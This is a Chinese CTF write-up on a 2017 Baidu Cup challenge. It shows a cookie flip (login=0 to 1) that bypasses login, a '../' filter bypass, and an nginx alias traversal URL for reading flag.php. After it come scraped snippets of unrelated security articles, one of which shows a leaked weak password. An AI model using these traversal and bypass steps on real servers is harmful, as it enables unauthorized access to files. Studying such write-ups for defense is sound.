nginx配置不当导致的目录遍历下载漏洞-“百度杯”CTF比赛 2017 二月场

题目:http://98fe42cede6c4f1c9ec3f55c0f542d06b680d580b5bf41d4.game.ichunqiu.com/login.php

题目内容:

网站要上线了,还没测试呢,怎么办?

经过测试在点击Mini-Zone的时候会有如下数据包。

GET /index.php HTTP/1.1
Host: 98fe42cede6c4f1c9ec3f55c0f542d06b680d580b5bf41d4.game.ichunqiu.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://98fe42cede6c4f1c9ec3f55c0f542d06b680d580b5bf41d4.game.ichunqiu.com/login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; pgv_pvi=7564516352; UM_distinctid=164bb2a2660862-02cd87a728541b-3a760e5d-1fa400-164bb2a2661ce3; browse=CFlbTxUYU0BQU1hEVQJTRFBZSkdeQFFYWVRFR1xRWEJTV1hPXEdLTgBZXkRdSVpOGllZTFRTW0VYW0VFWVxbRklSWE9cRFNHXUFTHFREUUdZVlMGVEBQT0tRWERWXFlCRFFbVV9EU0FcWVxCTEoU; pgv_si=s2308230144; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1532146712,1532226185,1532311636,1532421067; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1532421150; ci_session=19b555adbbafd0f07b5833ee0a823f476db15f2f; login=0
Connection: close

有一个login参数为0将其改为1即登录成功。

然后发现如下URL,直接可判断为文件读取。

http://4ffbe25b5aee42ae9c6644d535d42cb0d37c385304924a5c.game.ichunqiu.com/manages/admin.php?module=index&name=php

然后测试是否过滤了../或者./

http://4ffbe25b5aee42ae9c6644d535d42cb0d37c385304924a5c.game.ichunqiu.com/manages/admin.php?module=inde../x&name=php 访问正常(将../替换为空了)

http://4ffbe25b5aee42ae9c6644d535d42cb0d37c385304924a5c.game.ichunqiu.com/manages/admin.php?module=inde./x&name=php 访问错误

直接读取flag.php(之前dirsearch有在根目录扫描到flag.php)发现失败。

然后读取nginx的配置文件发现一个目录遍历漏洞。

然后就可以通过

online-movies       #遍历online-movies目录

以及

/online-movies../  #遍历整个/online-movies../(其实就是服务器的根目录了),然后可以通过../后面输入目录进行遍历了,如果是文件就可以直接被下载。

http://032d3f10268c4cf790562d76c8b643a547b3246e6a494a33.game.ichunqiu.com/online-movies../var/www/html/flag.php

原文地址:https://www.cnblogs.com/nul1/p/9364552.html

时间: 2024-11-09 22:20:56

nginx配置不当导致的目录遍历下载漏洞-“百度杯”CTF比赛 2017 二月场的相关文章

nginx 配置不当导致目录遍历下载漏洞

今天做百度杯的时候发现一个题很有意思. 点进题目,发现了一个js重定向到login.php,抓包发现请求的header中cookie=0,做过这种类似的题目,o==false,在请求头里面将cookie=1,结果就进去了后台,(login.php中没有发现什么信息),进入后台, 点开Manage,如上图,网址的构造是module=index$name=php 推测是文件包含,我将index改成flag,说明flag在flag.php中我们所要做的就是提取出flag.php中的内容 思路1 用ph

Nginx配置不当可能导致的安全问题

Nginx配置不当可能导致的安全问题 Auther: Spark1e目前很多网站使用了nginx或者tenginx(淘宝基于Nginx研发的web服务器)来做反向代理和静态服务器,ningx的配置文件nginx.conf的一些错误配置可能引发一些安全问题.要了解这些问题,我们先简单了解一下Nginx的配置文件 0x00 Nginx的配置文件的格式 Nginx的主配置文件非常简短,是由一些模块构成的.在任何情况下Nginx都会加载其主配置文件.一个主配置文件nginx.conf的结构如下: ...

redis配置不当导致机器被黑

近日公司安全专家对业务云主机进行例行安全检查发现某redis服务器异常,现象如下: 1.系统的history和/var/log日志目录均被清空: 2.流量异常 3.恶意新建了一个id=0,名称为beef-xbdb的高权限用户,其home目录是/root,跟root用户的属性做了绑定: 4./boot启动目录有名称为gakzigdpzp的木马文件: 5./boot目录下面的木马文件与192.225.230.143,一个香港的IP存在SYN_SENT连接状态的网络交互行为: 6.多个目录存在木马/后

NFS配置不当导致的那些事儿

NFS(Network File System):是FreeBSD支持的文件系统中的一种,它允许网络中的计算机之间通过TCP/IP网络共享资源: NFS配置:(声明:以下NFS实验是在RedHat7上完成) 首先安装NFS(我的机子是最小化的系统,需要自己安装): yum install nfs-utils.x86_64 -y 启动服务: systemctl start rpcbind(如果这个服务不启动,nfs服务会启动失败) systemctl start nfs-server system

Nginx配置指定媒体类型文件强制下载

由于业务需要,在点击显示链接(如www.xxx.com/2015-01-15/xxx.png)显示媒体资源(如图片.视频.音频.文档),而在点击下载链接(如www.xxx.com/2015-01-15/xxx.png?download=true)请求静态资源时,强制下载而不是在浏览器中直接显示.经过多方查找各种方案,可以在nginx中设置强制下载,如下: 1 location ~ .*\.(gif|jpg|jpeg|bmp|png|mp3|wma|mp4|swf|txt)$ 2 { 3 if (

配置不当导致无法加载odoo-10.0模块

启动odoo-bin时出错 2017-01-05 06:38:51,046 5480 INFO ? odoo: Odoo version 10.02017-01-05 06:38:51,046 5480 INFO ? odoo: Using configuration file at C:\odoo-10.0\debian\odoo.conf2017-01-05 06:38:51,046 5480 INFO ? odoo: addons paths: [u'C:\\Users\\hello\\A

加某处配置不当导致大量内部信息泄露

mail.oneplus.cn弱口令[email protected] sunlin123 个人网盘详细员工信息,举个栗子好多附件顺带沦下[email protected] 邮箱和[email protected] 邮箱的密码.新密码为:Support2015由于有更多的同事要使用Zendesk来支持印度服务业务,原来我的账号([email protected])已经满足不了要求,因此我开通了3个账号,供你们使用.它们是:   同时也是邮箱账号:[email protected]  密码:one

ftp+nginx+lua_Nginx+GraphicsMagick来实现目录浏览、实时缩略图

一.FTP服务器安装配置 1.rpm -ivh vsftpd-2.2.2-11.el6_4.1.i686.rpm 2.service vsftpd start 3.chkconfig vsftpd on 4.配置 cp /etc/vsftpd/vsftpd.conf /etc/vsftpd/vsftpd.conf.bak vim /etc/vsftpd/vsftpd.conf 12 anonymous_enable=NO 禁止匿名访问...121 chroot_local_user=yes 禁锢

什么是目录遍历攻击及如何防护

前几日研究某Web项目源代码,使用的是ThinkPHP框架,根目录下有个www目录,存放项目模块的入口文件.顿时茫然,本人一般直接把入口文件放在web根目录,而这里却是www目录,不知www目录是何作用,遂问老大,老大回:你查查什么是目录遍历攻击.所以才懂得www目录之所以存在的目的... 描述 攻击人员通过目录便利攻击可以获取系统文件及服务器的配置文件等等.一般来说,他们利用服务器API.文件标准权限进行攻击.严格来说,目录遍历攻击并不是一种web漏洞,而是网站设计人员的设计“漏洞”.如果we